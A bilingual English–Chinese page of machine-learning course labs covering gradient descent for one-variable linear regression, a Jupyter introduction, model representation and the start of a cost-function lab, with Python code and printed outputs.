    $$\begin{align*} \text{repeat}&\text{ until convergence:} ; \lbrace \newline
    ; w &= w - \alpha \frac{\partial J(w,b)}{\partial w} \tag{3} ; \newline
    b &= b - \alpha \frac{\partial J(w,b)}{\partial b} \newline \rbrace
    \end{align*}$$
    where, parameters $w$, $b$ are updated simultaneously.

    其中,参数 w、b 同时更新。

    The gradient is defined as:

    梯度定义为:

    $$
    \begin{align}
    \frac{\partial J(w,b)}{\partial w} &= \frac{1}{m} \sum\limits_{i = 0}^{m-1} (f_{w,b}(x^{(i)}) - y{(i)})x{(i)} \tag{4}\
    \frac{\partial J(w,b)}{\partial b} &= \frac{1}{m} \sum\limits_{i = 0}^{m-1} (f_{w,b}(x^{(i)}) - y^{(i)}) \tag{5}\
    \end{align}
    $$

    Here simultaniously means that you calculate the partial derivatives for all the parameters before updating any of the parameters.

    此处 同时 表示在更新任何参数之前计算所有参数的偏导数。

    Implement Gradient Descent 实现梯度下降

    You will implement gradient descent algorithm for one feature. You will need three functions.

    您将为一个要素实现梯度下降算法。您将需要三个函数。

    • compute_gradient implementing equation (4) and (5) above
      • 实现上述等式(4)和(5)
    • compute_cost implementing equation (2) above (code from previous lab)
      • 实现上面的等式(2)(上一个实验的代码)
    • gradient_descent, utilizing compute_gradient and compute_cost
      • 利用 compute_gradient 和 compute_cost

    Conventions: 规定:

    • The naming of python variables containing partial derivatives follows this pattern,$\frac{\partial J(w,b)}{\partial b}$ will be dj_db.
      • 包含偏导数的 python 变量的命名遵循此模式, 将 $\frac{\partial J(w,b)}{\partial b}$ 记作 dj_db
    • w.r.t is With Respect To, as in partial derivative of $J(wb)$ With Respect To $b$.
      • w.r.t 是关于,如 $J(wb)$ 相对于 $b$ 的偏导数。

    compute_gradient


    compute_gradient implements (4) and (5) above and returns $\frac{\partial J(w,b)}{\partial w}$,$\frac{\partial J(w,b)}{\partial b}$. The embedded comments describe the operations.

    compute_gradient 实现 (4) 和 (5) 并返回 $\frac{\partial J(w,b)}{\partial w}$,$\frac{\partial J(w,b)}{\partial b}$。嵌入的注释描述操作。

    def compute_gradient(x, y, w, b): 
    """
    Computes the gradient for linear regression
    计算线性回归的梯度
    Args:
    x (ndarray (m,)): Data, m examples
    y (ndarray (m,)): target values
    w,b (scalar) : model parameters
    Returns
    dj_dw (scalar): The gradient of the cost w.r.t. the parameters w
    dj_db (scalar): The gradient of the cost w.r.t. the parameter b
    """

    # Number of training examples
    m = x.shape[0]
    dj_dw = 0
    dj_db = 0

    for i in range(m):
    f_wb = w * x[i] + b
    dj_dw_i = (f_wb - y[i]) * x[i]
    dj_db_i = f_wb - y[i]
    dj_db += dj_db_i
    dj_dw += dj_dw_i
    dj_dw = dj_dw / m
    dj_db = dj_db / m

    return dj_dw, dj_db

    png

    The lectures described how gradient descent utilizes the partial derivative of the cost with respect to a parameter at a point to update that parameter.
    Let’s use our compute_gradient function to find and plot some partial derivatives of our cost function relative to one of the parameters, $w_0$.

    课程描述了梯度下降如何利用成本相对于某个点的参数的偏导数来更新该参数。
    让我们使用compute_gradient函数来查找并绘制成本函数相对于其中一个参数 $w_0$ 的一些偏导数。

    plt_gradients(x_train,y_train, compute_cost, compute_gradient)
    plt.show()

    png

    Above, the left plot shows $\frac{\partial J(w,b)}{\partial w}$ or the slope of the cost curve relative to $w$ at three points. On the right side of the plot, the derivative is positive, while on the left it is negative. Due to the ‘bowl shape’, the derivatives will always lead gradient descent toward the bottom where the gradient is zero.

    上图显示了 $\frac{\partial J(w,b)}{\partial w}$ 或成本曲线相对于 $w$ 的斜率在三个点。在图的右侧,导数为正,而在左侧为负。由于“碗形”,衍生物将始终导致梯度下降到梯度为零的底部。

    The left plot has fixed $b=100$. Gradient descent will utilize both $\frac{\partial J(w,b)}{\partial w}$ and $\frac{\partial J(w,b)}{\partial b}$ to update parameters. The ‘quiver plot’ on the right provides a means of viewing the gradient of both parameters. The arrow sizes reflect the magnitude of the gradient at that point. The direction and slope of the arrow reflects the ratio of $\frac{\partial J(w,b)}{\partial w}$ and $\frac{\partial J(w,b)}{\partial b}$ at that point.
    Note that the gradient points away from the minimum. Review equation (3) above. The scaled gradient is subtracted from the current value of $w$ or $b$. This moves the parameter in a direction that will reduce cost.

    左边的图固定 $b=100$。梯度下降将利用 $\frac{\partial J(w,b)}{\partial w}$ 和 $\frac{\partial J(w,b)}{\partial b}$ 来更新参数。右侧的“箭袋图”提供了一种查看两个参数梯度的方法。箭头大小反映了该点处渐变的大小。箭头的方向和斜率反映了该点 $\frac{\partial J(w,b)}{\partial w}$ 和 $\frac{\partial J(w,b)}{\partial b}$ 的比率。请注意,渐变点远离最小值。查看上面的等式(3)。缩放的梯度从 $w$ 或 $b$ 的当前值中减去。这会将参数沿降低成本的方向移动。

    Gradient Descent 梯度下降

    Now that gradients can be computed, gradient descent, described in equation (3) above can be implemented below in gradient_descent. The details of the implementation are described in the comments. Below, you will utilize this function to find optimal values of $w$ and $b$ on the training data.

    现在可以计算梯度,上面等式(3)中描述的梯度下降可以在下面的gradient_descent中实现。注释中描述了实现的详细信息。下面,您将利用此函数在训练数据上找到 $w$ 和 $b$ 的最佳值。

    def gradient_descent(x, y, w_in, b_in, alpha, num_iters, cost_function, gradient_function): 
    """
    Performs gradient descent to fit w,b. Updates w,b by taking
    num_iters gradient steps with learning rate alpha
    执行梯度下降以拟合 w,b。更新 w,b 通过采取
    num_iters 梯度步长与学习速率 alpha

    Args:
    x (ndarray (m,)) : Data, m examples 训练集,m 个样本
    y (ndarray (m,)) : target values 目标值
    w_in,b_in (scalar): initial values of model parameters 模型参数的初始值
    alpha (float): Learning rate 学习率
    num_iters (int): number of iterations to run gradient descent 运行梯度下降的迭代次数
    cost_function: function to call to produce cost 调用函数以产生成本
    gradient_function: function to call to produce gradient 调用以产生渐变的函数

    Returns:
    w (scalar): Updated value of parameter after running gradient descent 更新了运行梯度下降后的参数值
    b (scalar): Updated value of parameter after running gradient descent
    J_history (List): History of cost values
    p_history (list): History of parameters [w,b]
    """

    w = copy.deepcopy(w_in) # avoid modifying global w_in 避免修改全局 w_in
    # An array to store cost J and w's at each iteration primarily for graphing later
    # 一个数组,用于在每次迭代时存储成本 J 和 w,主要用于以后绘制图形
    J_history = []
    p_history = []
    b = b_in
    w = w_in

    for i in range(num_iters):
    # Calculate the gradient and update the parameters using gradient_function
    # 计算梯度并使用 gradient_function 更新参数
    dj_dw, dj_db = gradient_function(x, y, w , b)

    # Update Parameters using equation (3) above
    # 使用上面的等式(3)更新参数
    b = b - alpha * dj_db
    w = w - alpha * dj_dw

    # Save cost J at each iteration
    # 每次迭代时节省成本 J
    if i<100000: # prevent resource exhaustion 防止资源耗尽
    J_history.append( cost_function(x, y, w , b))
    p_history.append([w,b])
    # Print cost every at intervals 10 times or as many iterations if < 10
    # 打印成本每隔 10 次,如果< 10 次,则迭代次数为 10 次
    if i% math.ceil(num_iters/10) == 0:
    print(f"Iteration {i:4}: Cost {J_history[-1]:0.2e} ",
    f"dj_dw: {dj_dw: 0.3e}, dj_db: {dj_db: 0.3e} ",
    f"w: {w: 0.3e}, b:{b: 0.5e}")

    return w, b, J_history, p_history #return w and J,w history for graphing
    # initialize parameters
    w_init = 0
    b_init = 0
    # some gradient descent settings
    iterations = 10000
    tmp_alpha = 1.0e-2
    # run gradient descent
    w_final, b_final, J_hist, p_hist = gradient_descent(x_train ,y_train, w_init, b_init, tmp_alpha,
    iterations, compute_cost, compute_gradient)
    print(f"(w,b) found by gradient descent: ({w_final:8.4f},{b_final:8.4f})")
    Iteration    0: Cost 7.93e+04  dj_dw: -6.500e+02, dj_db: -4.000e+02   w:  6.500e+00, b: 4.00000e+00Iteration 1000: Cost 3.41e+00  dj_dw: -3.712e-01, dj_db:  6.007e-01   w:  1.949e+02, b: 1.08228e+02Iteration 2000: Cost 7.93e-01  dj_dw: -1.789e-01, dj_db:  2.895e-01   w:  1.975e+02, b: 1.03966e+02Iteration 3000: Cost 1.84e-01  dj_dw: -8.625e-02, dj_db:  1.396e-01   w:  1.988e+02, b: 1.01912e+02Iteration 4000: Cost 4.28e-02  dj_dw: -4.158e-02, dj_db:  6.727e-02   w:  1.994e+02, b: 1.00922e+02Iteration 5000: Cost 9.95e-03  dj_dw: -2.004e-02, dj_db:  3.243e-02   w:  1.997e+02, b: 1.00444e+02Iteration 6000: Cost 2.31e-03  dj_dw: -9.660e-03, dj_db:  1.563e-02   w:  1.999e+02, b: 1.00214e+02Iteration 7000: Cost 5.37e-04  dj_dw: -4.657e-03, dj_db:  7.535e-03   w:  1.999e+02, b: 1.00103e+02Iteration 8000: Cost 1.25e-04  dj_dw: -2.245e-03, dj_db:  3.632e-03   w:  2.000e+02, b: 1.00050e+02Iteration 9000: Cost 2.90e-05  dj_dw: -1.082e-03, dj_db:  1.751e-03   w:  2.000e+02, b: 1.00024e+02(w,b) found by gradient descent: (199.9929,100.0116)

    png
    Take a moment and note some characteristics of the gradient descent process printed above.

    花点时间注意上面打印的渐变下降过程的一些特征。

    • The cost starts large and rapidly declines as described in the slide from the lecture.
      • 成本从大处开始并迅速下降,如课程幻灯片中所述。
    • The partial derivatives, dj_dw, and dj_db also get smaller, rapidly at first and then more slowly. As shown in the diagram from the lecture, as the process nears the ‘bottom of the bowl’ progress is slower due to the smaller value of the derivative at that point.
      • 偏导数、dj_dwdj_db也会变小,一开始很快,然后变慢。如讲座中的图表所示,由于该过程接近“碗的底部”,由于该点的导数值较小,因此进度较慢。
    • progress slows though the learning rate, alpha, remains fixed
      • 进度缓慢,但学习速率(alpha)保持不变

    Cost versus iterations of gradient descent 梯度下降的成本 VS 迭代

    A plot of cost versus iterations is a useful measure of progress in gradient descent. Cost should always decrease in successful runs. The change in cost is so rapid initially, it is useful to plot the initial decent on a different scale than the final descent. In the plots below, note the scale of cost on the axes and the iteration step.

    成本与迭代图是梯度下降进度的有用度量。在成功运行时,成本应始终降低。成本的变化最初是如此之快,因此在与最终下降不同的尺度上绘制初始体面是有用的。在下面的图中,请注意轴上的成本比例和迭代步骤。

    # plot cost versus iteration  
    fig, (ax1, ax2) = plt.subplots(1, 2, constrained_layout=True, figsize=(12,4))
    ax1.plot(J_hist[:100])
    ax2.plot(1000 + np.arange(len(J_hist[1000:])), J_hist[1000:])
    ax1.set_title("Cost vs. iteration(start)"); ax2.set_title("Cost vs. iteration (end)")
    ax1.set_ylabel('Cost') ; ax2.set_ylabel('Cost')
    ax1.set_xlabel('iteration step') ; ax2.set_xlabel('iteration step')
    plt.show()

    png

    Predictions 预测

    Now that you have discovered the optimal values for the parameters $w$ and $b$, you can now use the model to predict housing values based on our learned parameters. As expected, the predicted values are nearly the same as the training values for the same housing. Further, the value not in the prediction is in line with the expected value.

    现在,您已经发现了参数$w$ 和 $b$ 的最优值,现在可以使用该模型根据我们学习的参数预测住房值。正如预期的那样,预测值几乎与同一住房的训练值相同。此外,预测中没有的值与预期值一致。

    print(f"1000sqft house prediction {w_final*1.0 + b_final:0.1f} Thousand dollars")
    print(f"1200sqft house prediction {w_final*1.2 + b_final:0.1f} Thousand dollars")
    print(f"2000sqft house prediction {w_final*2.0 + b_final:0.1f} Thousand dollars")
    1000sqft house prediction 300.0 Thousand dollars1200sqft house prediction 340.0 Thousand dollars2000sqft house prediction 500.0 Thousand dollars

    Plotting

    You can show the progress of gradient descent during its execution by plotting the cost over iterations on a contour plot of the cost(w,b).

    您可以通过在成本的等值线图(w,b)上绘制迭代成本来显示梯度下降的执行过程中的进度。

    fig, ax = plt.subplots(1,1, figsize=(12, 6))
    plt_contour_wgrad(x_train, y_train, p_hist, ax)

    png

    Above, the contour plot shows the $cost(w,b)$ over a range of $w$ and $b$. Cost levels are represented by the rings. Overlayed, using red arrows, is the path of gradient descent. Here are some things to note:

    • The path makes steady (monotonic) progress toward its goal.
    • initial steps are much larger than the steps near the goal.

    上图显示了 $w$ 和 $b$ 范围内的 $cost(w,b)$。成本水平由环表示。使用红色箭头叠加是渐变下降的路径。以下是一些需要注意的事项:

    • 这条道路朝着其目标稳步(单调)前进。
    • 初始步骤比目标附近的步骤大得多。

    Zooming in, we can see that final steps of gradient descent. Note the distance between steps shrinks as the gradient approaches zero.

    放大,我们可以看到梯度下降的最后一步。请注意,当梯度接近零时,步长之间的距离会缩小。

    fig, ax = plt.subplots(1,1, figsize=(12, 4))
    plt_contour_wgrad(x_train, y_train, p_hist, ax, w_range=[180, 220, 0.5], b_range=[80, 120, 0.5],
    contours=[1,5,10,20],resolution=0.5)

    png

    Increased Learning Rate

    png

    In the lecture, there was a discussion related to the proper value of the learning rate, $\alpha$ in equation(3). The larger $\alpha$ is, the faster gradient descent will converge to a solution. But, if it is too large, gradient descent will diverge. Above you have an example of a solution which converges nicely.

    Let’s try increasing the value of $\alpha$ and see what happens:

    在讲座中,有一个关于学习速率的适当值的讨论,$\alpha$等式 (3)。$\alpha$越大,梯度下降的速度就越快,就会收敛到一个解决方案。但是,如果它太大,梯度下降将发散。上面你有一个解决方案的例子,它很好地收敛了。
    让我们尝试增加 $\alpha$ 的值,看看会发生什么:

    # initialize parameters
    w_init = 0
    b_init = 0
    # set alpha to a large value
    iterations = 10
    tmp_alpha = 8.0e-1
    # run gradient descent
    w_final, b_final, J_hist, p_hist = gradient_descent(x_train ,y_train, w_init, b_init, tmp_alpha,
    iterations, compute_cost, compute_gradient)
    Iteration    0: Cost 2.58e+05  dj_dw: -6.500e+02, dj_db: -4.000e+02   w:  5.200e+02, b: 3.20000e+02Iteration    1: Cost 7.82e+05  dj_dw:  1.130e+03, dj_db:  7.000e+02   w: -3.840e+02, b:-2.40000e+02Iteration    2: Cost 2.37e+06  dj_dw: -1.970e+03, dj_db: -1.216e+03   w:  1.192e+03, b: 7.32800e+02Iteration    3: Cost 7.19e+06  dj_dw:  3.429e+03, dj_db:  2.121e+03   w: -1.551e+03, b:-9.63840e+02Iteration    4: Cost 2.18e+07  dj_dw: -5.974e+03, dj_db: -3.691e+03   w:  3.228e+03, b: 1.98886e+03Iteration    5: Cost 6.62e+07  dj_dw:  1.040e+04, dj_db:  6.431e+03   w: -5.095e+03, b:-3.15579e+03Iteration    6: Cost 2.01e+08  dj_dw: -1.812e+04, dj_db: -1.120e+04   w:  9.402e+03, b: 5.80237e+03Iteration    7: Cost 6.09e+08  dj_dw:  3.156e+04, dj_db:  1.950e+04   w: -1.584e+04, b:-9.80139e+03Iteration    8: Cost 1.85e+09  dj_dw: -5.496e+04, dj_db: -3.397e+04   w:  2.813e+04, b: 1.73730e+04Iteration    9: Cost 5.60e+09  dj_dw:  9.572e+04, dj_db:  5.916e+04   w: -4.845e+04, b:-2.99567e+04

    Above, $w$ and $b$ are bouncing back and forth between positive and negative with the absolute value increasing with each iteration. Further, each iteration $\frac{\partial J(w,b)}{\partial w}$ changes sign and cost is increasing rather than decreasing. This is a clear sign that the learning rate is too large and the solution is diverging.
    Let’s visualize this with a plot.

    上面,$w$ 和 $b$ 在正负之间来回反弹,绝对值随着每次迭代而增加。此外,每次迭代 $\frac{\partial J(w,b)}{\partial w}$ 都会改变符号,成本在增加而不是减少。这是一个明显的迹象,表明学习速率太大,解决方案正在发散。让我们用一个情节来可视化它。

    plt_divergence(p_hist, J_hist,x_train, y_train)
    plt.show()
    ---------------------------------------------------------------------------OverflowError                             Traceback (most recent call last)Input In [16], in <cell line: 1>()----> 1 plt_divergence(p_hist, J_hist,x_train, y_train)      2 plt.show()File ~\Jupyter\吴恩达-ML\week1\work\lab_utils_uni.py:305, in plt_divergence(p_hist, J_hist, x_train, y_train)    303 for i in range(len(w_array)):    304     tmp_w = w_array[i]--> 305     cost[i] = compute_cost(x_train, y_train, tmp_w, fix_b)    307 ax.plot(w_array, cost)    308 ax.plot(x,v, c=dlmagenta)OverflowError: Python int too large to convert to C long

    png

    Above, the left graph shows $w$'s progression over the first few steps of gradient descent. $w$ oscillates from positive to negative and cost grows rapidly. Gradient Descent is operating on both $w$ and $b$ simultaneously, so one needs the 3-D plot on the right for the complete picture.

    上图显示了 w 在梯度下降的前几步中的进展。w 从正向负振荡,成本迅速增长。梯度下降同时在 w 和 b 上运行,因此需要右侧的 3D 图才能获得完整的图像。

    Congratulations!

    In this lab you:

    • delved into the details of gradient descent for a single variable.
    • developed a routine to compute the gradient
    • visualized what the gradient is
    • completed a gradient descent routine
    • utilized gradient descent to find parameters
    • examined the impact of sizing the learning rate

    在本实验中,您将:

    • 深入研究单个变量的梯度下降细节。
    • 开发了一个例程来计算梯度
    • 可视化梯度是什么
    • 完成梯度下降例程
    • 利用梯度下降来查找参数
    • 研究了调整学习率的影响
    ]]> + 资源

    Week1

    Optional Lab: Brief Introduction to Python and Jupyter Notebooks

    可选实验:对 Python 与 Jupyter Notebooks 作简短的介绍。

    Welcome to the first optional lab!

    欢迎来到第一次可选实验!

    Optional labs are available to:

    可选实验的用处:

    • provide information - like this notebook

      • 提供信息——像这个笔记本
    • reinforce lecture material with hands-on examples

      • 对上手实例提供更好的课程工具
    • provide working examples of routines used in the graded labs

      • 提供作业实例用于各个实验

    Goals

    目标

    In this lab, you will:

    在这次实验中,你将:

    • Get a brief introduction to Jupyter notebooks

      • 获得对 Jupyter notebooks 的简短介绍
    • Take a tour of Jupyter notebooks

      • 体验一次 Jupyter notebooks
    • Learn the difference between markdown cells and code cells

      • 了解到 markdown cells 与 code cells 的区别
    • Practice some basic python

      • 练习一些基础 Python 知识

    The easiest way to become familiar with Jupyter notebooks is to take the tour available above in the Help menu:

    熟悉 Jupyter notebooks 最简单的方法就是点击 Help 菜单栏中的 User Interface Tour(用户导览)选项

    png

    Jupyter notebooks have two types of cells that are used in this course. Cells such as this which contain documentation called Markdown Cells. The name is derived from the simple formatting language used in the cells. You will not be required to produce markdown cells. Its useful to understand the cell pulldown shown in graphic below. Occasionally, a cell will end up in the wrong mode and you may need to restore it to the right state:

    在这个资源中,使用到了 Jupyter notebooks 的两种类型的片段。包含文档信息的片段被称之为 Markdown Cells。这个片段命名来自于其使用的简洁格式语言。你并不被要求创建 markdown cells。但这对你理解下面的cell pulldown 很有帮助。有时,单元格会以错误的模式结束,您可能需要将其恢复到正确的状态:

    png

    The other type of cell is the code cell where you will write your code:

    另一种类型的片段被称之为 code cell,你可以在这里撰写你的代码:

    1
    2
    #This is  a 'Code' Cell
    print("This is code cell")
    This is  code cell

    Python

    You can write your code in the code cells.

    你可以在 code cells 中撰写你的代码,

    To run the code, select the cell and either

    要想运行代码,选择这个片段并:

    • hold the shift-key down and hit ‘enter’ or ‘return’
      • 按下 Shift+Enter(或 Return)键
    • click the ‘run’ arrow above
      • 点击 run 按钮

    png

    输出结果

    Print statements will generally use the python f-string style.

    输出结果默认使用 python 的 f-string 风格

    Try creating your own print in the following cell.

    尝试在下面这个片段创建你自己的输出。

    Try both methods of running the cell.

    尝试两种方法运行这个片段。

    1
    2
    3
    # print statements
    variable = "right in the strings!"
    print(f"f strings allow you to embed variables {variable}")
    f strings allow you to embed variables right in the strings!

    Congratulations!

    恭喜!

    You now know how to find your way around a Jupyter Notebook.

    你知道了怎么使用 Jupyter Notebook。


    Optional Lab: Model Representation

    png

    Goals

    In this lab you will:
    在这次实验中你将:

    • Learn to implement the model $f_{w,b}$ for linear regression with one variable
      学习实现单变量线性回归

    Notation

    Here is a summary of some of the notation you will encounter.
    以下是您将遇到的一些符号的摘要.

    General Notation
    一般表示法
    Description
    描述
    Python
    (if applicable 如果适用)
    $a$scalar, non bold 标量,非粗体
    $\mathbf{a}$vector, bold 向量,粗体
    Regression 回归
    $\mathbf{x}$Training Example feature values (in this lab - Size (1000sqft)) 训练示例特征值(在本练习中 - 大小(1000 平方英尺))x_train
    $\mathbf{y}$Training Example targets (in this lab Price (1000s of dollars)). 训练示例目标(在本练习中为价格(1000 美元))。y_train
    $x^{(i)}$, $y^{(i)}$$i_{th}$Training Example 训练示例x_i, y_i
    mNumber of training examples 训练示例数量m
    $w$parameter: weight, 参数:斜率w
    $b$parameter: bias 参数:截距b
    $f_{w,b}(x^{(i)})$The result of the model evaluation at $x^{(i)}$ parameterized by $w,b$: $f_{w,b}(x^{(i)}) = wx^{(i)}+b$f_wb

    Tools

    In this lab you will make use of:

    • NumPy, a popular library for scientific computing
    • Matplotlib, a popular library for plotting data
    1
    2
    3
    import numpy as np
    import matplotlib.pyplot as plt
    plt.style.use('./deeplearning.mplstyle')

    Problem Statement

    png

    As in the lecture, you will use the motivating example of housing price prediction.
    This lab will use a simple data set with only two data points - a house with 1000square feet(sqft) sold for $300,000 and a house with 2000square feet sold for $500,000. These two points will constitute our data or training set. In this lab, the units of size are 1000sqft and the units of price are 1000s of dollars.

    与课堂一样,您将使用房价预测的激励性示例。
    本实验将使用一个只有两个数据点的简单数据集 - 一个以$300,000 出售的 1000 平方英尺的房子和一个以$500,000 出售的 2000 平方英尺的房子。这两点将构成我们的数据或训练集。在这个实验室中,大小单位是 1000 平方英尺,价格单位是 1000 美元。

    Size (1000sqft)Price (1000s of dollars)
    1.0300
    2.0500

    You would like to fit a linear regression model (shown above as the blue straight line) through these two points, so you can then predict price for other houses - say, a house with 1200sqft.

    您希望通过这两个点拟合线性回归模型(如上图所示为蓝色直线),以便您可以预测其他房屋的价格 - 例如,1200 平方英尺的房屋。

    Please run the following code cell to create your x_train and y_train variables. The data is stored in one-dimensional NumPy arrays.

    请运行以下代码单元以创建“x_train”和“y_train”变量。数据存储在一维 NumPy 数组中。

    1
    2
    3
    4
    5
    6
    # x_train is the input variable (size in 1000square feet)
    # y_train is the target (price in 1000s of dollars)
    x_train = np.array([1.0, 2.0])
    y_train = np.array([300.0, 500.0])
    print(f"x_train = {x_train}")
    print(f"y_train = {y_train}")
    x_train = [1. 2.]y_train = [300. 500.]

    Note: The course will frequently utilize the python ‘f-string’ output formatting described here when printing. The content between the curly braces is evaluated when producing the output.

    注意:本课程在打印时将经常使用此处描述的 python“f-string”输出格式。生成输出时,将计算大括号之间的内容。

    Number of training examples m

    You will use m to denote the number of training examples. Numpy arrays have a .shape parameter. x_train.shape returns a python tuple with an entry for each dimension. x_train.shape[0] is the length of the array and number of examples as shown below.

    您将使用 m 表示训练示例的数量。枚举数组具有 a.shape 参数。x_train.shape 返回一个 python 元组,其中包含每个维度的条目。x_train.shape[0] 是数组的长度和示例的数量,如下所示。

    1
    2
    3
    4
    # m is the number of training examples
    print(f"x_train.shape: {x_train.shape}")
    m = x_train.shape[0]
    print(f"Number of training examples is: {m}")
    x_train.shape: (2,)Number of training examples is: 2

    One can also use the Python len() function as shown below.

    也可以使用 Python len()函数,如下所示。

    1
    2
    3
    # m is the number of training examples
    m = len(x_train)
    print(f"Number of training examples is: {m}")
    Number of training examples is: 2

    Training example x_i, y_i

    You will use (x$^{(i)}$, y$^{(i)}$) to denote the $i^{th}$ training example. Since Python is zero indexed, (x$^{(0)}$, y$^{(0)}$) is (1.0, 300.0) and (x$^{(1)}$, y$^{(1)}$) is (2.0, 500.0).

    To access a value in a Numpy array, one indexes the array with the desired offset. For example the syntax to access location zero of x_train is x_train[0].
    Run the next code block below to get the $i^{th}$ training example.

    您将使用 (x$^{(i)}$, y$^{(i)}$) 来表示第 i 个训练示例。由于 Python 的索引为零,因此 (x$^{(0)}$, y$^{(0)}$) 是 (1.0, 300.0) 和 (x$^{(1)}$, y$^{(1)}$) 是 (2.0, 500.0)。

    要访问 Numpy 数组中的值,请使用所需的偏移量对数组编制索引。例如,访问x_train的位置零的语法是x_train[0]。运行下面的下一个代码块以获取第 i 个训练示例。

    1
    2
    3
    4
    5
    i = 0 # Change this to 1 to see (x^1, y^1)

    x_i = x_train[i]
    y_i = y_train[i]
    print(f"(x^({i}), y^({i})) = ({x_i}, {y_i})")
    (x^(0), y^(0)) = (1.0, 300.0)
    1
    2
    3
    4
    5
    i = 1

    x_i = x_train[i]
    y_i = y_train[i]
    print(f"(x^({i}), y^({i})) = ({x_i}, {y_i})")
    (x^(1), y^(1)) = (2.0, 500.0)

    Plotting the data 绘制数据

    You can plot these two points using the scatter() function in the matplotlib library, as shown in the cell below.

    • The function arguments marker and c show the points as red crosses (the default is blue dots).

    You can use other functions in the matplotlib library to set the title and labels to display

    您可以使用 matplotlib 库中的 scatter() 函数绘制这两个点,如下面的单元格所示。

    • 函数参数 markc 将点显示为红十字(默认值为蓝点)。

    您可以使用 matplotlib 库中的其他函数来设置要显示的标题和标签

    1
    2
    3
    4
    5
    6
    7
    8
    9
    # Plot the data points
    plt.scatter(x_train, y_train, marker='x', c='r')
    # Set the title
    plt.title("Housing Prices")
    # Set the y-axis label
    plt.ylabel('Price (in 1000s of dollars)')
    # Set the x-axis label
    plt.xlabel('Size (1000sqft)')
    plt.show()

    png

    Model function 模型函数

    png

    As described in lecture, the model function for linear regression (which is a function that maps from x to y) is represented as

    如讲座中所述,线性回归的模型函数(从 x 映射到 y 的函数)表示为

    $$ f_{w,b}(x^{(i)}) = wx^{(i)} + b \tag{1}$$

    The formula above is how you can represent straight lines - different values of $w$ and $b$ give you different straight lines on the plot.

    上面的公式决定如何表示直线 - 不同的 $w$ 和 $b$ 值在图上显示不同的直线。

    Let’s try to get a better intuition for this through the code blocks below. Let’s start with $w = 100$ and $b = 100$.

    让我们尝试通过下面的代码块获得更好的直觉。让我们从 w=100 和 b=100 开始。

    Note: You can come back to this cell to adjust the model’s w and b parameters

    注意:您可以返回此单元格以调整模型的 w 和 b 参数

    1
    2
    3
    4
    w = 100
    b = 100
    print(f"w: {w}")
    print(f"b: {b}")
    w: 100b: 100

    Now, let’s compute the value of $f_{w,b}(x^{(i)})$ for your two data points. You can explicitly write this out for each data point as -

    现在,让我们计算两个数据点的 $f_{w,b}(x^{(i)})$ 值。您可以为每个数据点显式地将其写出为 -

    for $x^{(0)}$, f_wb = w * x[0] + b

    for $x^{(1)}$, f_wb = w * x[1] + b

    For a large number of data points, this can get unwieldy and repetitive. So instead, you can calculate the function output in a for loop as shown in the compute_model_output function below.

    对于大量数据点,这可能会变得笨拙和重复。因此,您可以计算 for 循环中的函数输出,如下面的 compute_model_output 函数所示。

    Note: The argument description (ndarray (m,)) describes a Numpy n-dimensional array of shape (m,). (scalar) describes an argument without dimensions, just a magnitude.

    注意:参数描述 (ndarray (m,)) 描述了形状 (m,) 的 Numpy n 维数组。(scalar)描述一个没有维度的参数,只是一个量级。

    Note: np.zero(n) will return a one-dimensional numpy array with $n$ entries

    注意np.zero(n) 将返回一个包含 $n$ 个条目的一维 numpy 数组

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    def compute_model_output(x, w, b):
    """
    Computes the prediction of a linear model
    计算线性模型的预测
    Args:
    x (ndarray (m,)): Data, m examples
    w,b (scalar) : model parameters
    Returns
    y (ndarray (m,)): target values
    """
    m = x.shape[0]
    f_wb = np.zeros(m)
    for i in range(m):
    f_wb[i] = w * x[i] + b

    return f_wb

    Now let’s call the compute_model_output function and plot the output.

    现在,让我们调用 compute_model_output 函数并绘制输出。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    tmp_f_wb = compute_model_output(x_train, w, b,)

    # Plot our model prediction
    plt.plot(x_train, tmp_f_wb, c='b',label='Our Prediction')

    # Plot the data points
    plt.scatter(x_train, y_train, marker='x', c='r',label='Actual Values')

    # Set the title
    plt.title("Housing Prices")
    # Set the y-axis label
    plt.ylabel('Price (in 1000s of dollars)')
    # Set the x-axis label
    plt.xlabel('Size (1000sqft)')
    plt.legend()
    plt.show()

    png

    As you can see, setting $w = 100$ and $b = 100$ does not result in a line that fits our data.

    如您所见,设置 $w = 100$ 和 $b = 100$ 不会生成适合我们数据的线。

    Challenge 挑战

    Try experimenting with different values of $w$ and $b$. What should the values be for a line that fits our data?

    尝试使用 $w$ 和 $b$ 的不同值。适合我们数据的线的值应该是多少?

    Tip:

    You can use your mouse to click on the triangle to the left of the green “Hints” below to reveal some hints for choosing b and w.

    您可以使用鼠标单击下面绿色“提示”左侧的三角形,以显示选择 b 和 w 的一些提示。

    Hints

    • Try $w = 200$ and $b = 100$

    Prediction

    Now that we have a model, we can use it to make our original prediction. Let’s predict the price of a house with 1200sqft. Since the units of $x$ are in 1000’s of sqft, $x$ is 1.2.

    现在我们有了一个模型,我们可以用它来做出我们的原始预测。让我们预测 1200 平方英尺的房子的价格。由于 $x$ 的单位是 1000 的平方英尺,因此 $x$ 是 1.2。

    1
    2
    3
    4
    5
    6
    w = 200                         
    b = 100
    x_i = 1.2
    cost_1200sqft = w * x_i + b

    print(f"${cost_1200sqft:.0f} thousand dollars")
    $340 thousand dollars

    Congratulations!

    In this lab you have learned:

    • Linear regression builds a model which establishes a relationship between features and targets
      • In the example above, the feature was house size and the target was house price
      • for simple linear regression, the model has two parameters $w$ and $b$ whose values are ‘fit’ using training data.
      • once a model’s parameters have been determined, the model can be used to make predictions on novel data.

    在本实验中,您了解了:

    • 线性回归构建一个模型,该模型在特征和目标之间建立关系
      • 在上面的示例中,特征是房屋大小,目标是房价
      • 对于简单的线性回归,模型有两个参数$w$和$b$,其值使用训练数据“拟合”。
      • 一旦确定了模型的参数,该模型就可用于对新数据进行预测。

    Optional Lab: Cost Function

    png

    Goals

    In this lab you will:

    • you will implement and explore the cost function for linear regression with one variable.

    在本次实验中,您将:

    • 您将实现并探索具有一个变量的线性回归的成本函数。

    Tools

    In this lab we will make use of:

    • NumPy, a popular library for scientific computing
    • Matplotlib, a popular library for plotting data
    • local plotting routines in the lab_utils_uni.py file in the local directory

    在本实验中,我们将利用:

    • NumPy,一个流行的科学计算库
    • Matplotlib,用于绘制数据的流行库
    • 本地目录中 lab_utils_uni.py 文件中的本地绘图例程
    1
    2
    3
    4
    5
    import numpy as np
    %matplotlib widget
    import matplotlib.pyplot as plt
